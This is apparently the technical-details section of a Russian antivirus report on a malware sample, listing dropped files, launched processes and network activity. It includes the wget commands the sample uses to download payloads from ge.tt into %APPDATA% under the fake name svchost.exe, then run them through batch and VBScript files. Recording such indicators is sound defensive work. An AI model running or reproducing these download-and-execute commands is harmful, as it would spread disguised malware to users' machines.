Техническая информация
- '%APPDATA%\mindcrasher.exe'
- '%APPDATA%\svchost.exe'
- '%APPDATA%\wget.exe' http://ge.tt/api/1/files/3zdsT0l/0/blob?do###### -O "%APPDATA%\svchost.exe"
- '%APPDATA%\wget.exe' http://ge.tt/api/1/files/88eYI3l/0/blob?do###### -O "%APPDATA%\mindcrasher.exe"
- '%APPDATA%\svchost.exe' (загружен из сети Интернет)
- '%APPDATA%\mindcrasher.exe' (загружен из сети Интернет)
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\run.bat" "
- '<SYSTEM32>\wscript.exe' "%APPDATA%\start.vbs"
- %APPDATA%\svchost.exe
- %APPDATA%\mindcrasher.exe
- %APPDATA%\wget.exe
- %APPDATA%\run.bat
- %APPDATA%\start.vbs
- 'ge.tt':80
- ge.tt/api/1/files/88eYI3l/0/blob?do######
- ge.tt/api/1/files/3zdsT0l/0/blob?do######
- DNS ASK ge.tt
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'